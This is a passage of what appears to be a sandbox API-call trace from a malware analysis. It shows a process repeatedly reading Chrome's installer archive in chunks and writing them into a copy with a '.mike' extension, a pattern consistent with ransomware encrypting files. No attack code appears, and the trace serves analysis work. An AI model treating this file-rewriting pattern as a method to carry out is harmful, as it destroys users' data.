Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.346] GetFileType (hFile=0x1c8) returned 0x1 [0179.346] GetFileType (hFile=0x1c8) returned 0x1 [0179.347] ReadFile (in: hFile=0x1c8, lpBuffer=0x21f7c68, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x21f7c68*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0179.348] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0179.348] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.348] GetFileType (hFile=0x1c8) returned 0x1 [0179.349] GetFileType (hFile=0x1c8) returned 0x1 [0179.349] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x46aa220 [0179.349] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0179.349] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.350] GetFileType (hFile=0x1c8) returned 0x1 [0179.350] GetFileType (hFile=0x1c8) returned 0x1 [0179.350] ReadFile (in: hFile=0x1c8, lpBuffer=0x2204c50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x2204c50*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0179.351] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0179.351] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.352] GetFileType (hFile=0x1c8) returned 0x1 [0179.352] GetFileType (hFile=0x1c8) returned 0x1 [0179.352] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x46aca20 [0179.352] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0179.352] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.353] GetFileType (hFile=0x1c8) returned 0x1 [0179.353] GetFileType (hFile=0x1c8) returned 0x1 [0179.353] ReadFile (in: hFile=0x1c8, lpBuffer=0x2211c38, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x2211c38*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0179.354] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0179.354] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.355] GetFileType (hFile=0x1c8) returned 0x1 [0179.355] GetFileType (hFile=0x1c8) returned 0x1 [0179.355] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x46af220 [0179.355] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0179.356] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.356] GetFileType (hFile=0x1c8) returned 0x1 [0179.356] GetFileType (hFile=0x1c8) returned 0x1 [0179.356] ReadFile (in: hFile=0x1c8, lpBuffer=0x221ec20, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x221ec20*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0179.357] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0179.358] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.358] GetFileType (hFile=0x1c8) returned 0x1 [0179.358] GetFileType (hFile=0x1c8) returned 0x1 [0179.358] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x46b1a20 [0179.359] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0179.359] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.359] GetFileType (hFile=0x1c8) returned 0x1 [0179.359] GetFileType (hFile=0x1c8) returned 0x1 [0179.360] ReadFile (in: hFile=0x1c8, lpBuffer=0x222bc08, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x222bc08*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0179.361] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0179.361] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.361] GetFileType (hFile=0x1c8) returned 0x1 [0179.361] GetFileType (hFile=0x1c8) returned 0x1 [0179.361] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x46b4220 [0179.362] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0179.362] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.362] GetFileType (hFile=0x1c8) returned 0x1 [0179.362] GetFileType (hFile=0x1c8) returned 0x1 [0179.363] ReadFile (in: hFile=0x1c8, lpBuffer=0x2238bf0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x2238bf0*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0179.364] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0179.364] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.364] GetFileType (hFile=0x1c8) returned 0x1 [0179.364] GetFileType (hFile=0x1c8) returned 0x1 [0179.364] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x46b6a20 [0179.365] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0179.365] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.365] GetFileType (hFile=0x1c8) returned 0x1 [0179.366] GetFileType (hFile=0x1c8) returned 0x1 [0179.366] ReadFile (in: hFile=0x1c8, lpBuffer=0x2245bd8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x2245bd8*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0179.367] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0179.367] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.367] GetFileType (hFile=0x1c8) returned 0x1 [0179.367] GetFileType (hFile=0x1c8) returned 0x1 [0179.368] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x46b9220 [0179.368] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0179.368] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.368] GetFileType (hFile=0x1c8) returned 0x1 [0179.369] GetFileType (hFile=0x1c8) returned 0x1 [0179.369] ReadFile (in: hFile=0x1c8, lpBuffer=0x2252bc0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x2252bc0*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0179.370] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0179.370] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.370] GetFileType (hFile=0x1c8) returned 0x1 [0179.371] GetFileType (hFile=0x1c8) returned 0x1 [0179.371] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x46bba20 [0179.371] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0179.371] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.372] GetFileType (hFile=0x1c8) returned 0x1 [0179.372] GetFileType (hFile=0x1c8) returned 0x1 [0179.372] ReadFile (in: hFile=0x1c8, lpBuffer=0x225fba8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x225fba8*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0179.374] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0179.374] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.374] GetFileType (hFile=0x1c8) returned 0x1 [0179.374] GetFileType (hFile=0x1c8) returned 0x1 [0179.374] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x46be220 [0179.376] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0179.376] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.376] GetFileType (hFile=0x1c8) returned 0x1 [0179.377] GetFileType (hFile=0x1c8) returned 0x1 [0179.377] ReadFile (in: hFile=0x1c8, lpBuffer=0x226cb90, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x226cb90*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0179.378] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0179.378] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.378] GetFileType (hFile=0x1c8) returned 0x1 [0179.378] GetFileType (hFile=0x1c8) returned 0x1 [0179.378] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x46c0a20 [0179.379] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0179.379] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.379] GetFileType (hFile=0x1c8) returned 0x1 [0179.379] GetFileType (hFile=0x1c8) returned 0x1 [0179.380] ReadFile (in: hFile=0x1c8, lpBuffer=0x2279b78, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x2279b78*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0179.381] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0179.381] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.381] GetFileType (hFile=0x1c8) returned 0x1 [0179.381] GetFileType (hFile=0x1c8) returned 0x1 [0179.381] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x46c3220 [0179.382] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0179.382] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.382] GetFileType (hFile=0x1c8) returned 0x1 [0179.382] GetFileType (hFile=0x1c8) returned 0x1 [0179.383] ReadFile (in: hFile=0x1c8, lpBuffer=0x2286b60, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x2286b60*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0179.384] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0179.384] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.384] GetFileType (hFile=0x1c8) returned 0x1 [0179.384] GetFileType (hFile=0x1c8) returned 0x1 [0179.384] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af178*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af178*=0) returned 0x46c5a20 [0179.385] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z", lpFilePart=0x0) returned 0x52 [0179.385] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrome.7z"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1c8 [0179.385] GetFileType (hFile=0x1c8) returned 0x1 [0179.385] GetFileType (hFile=0x1c8) returned 0x1 [0179.386] ReadFile (in: hFile=0x1c8, lpBuffer=0x2293b48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af230, lpOverlapped=0x0 | out: lpBuffer=0x2293b48*, lpNumberOfBytesRead=0x2af230*=0x2800, lpOverlapped=0x0) returned 1 [0179.387] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike", lpFilePart=0x0) returned 0x57 [0179.387] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z.mike" (normalized: "c:\\program files 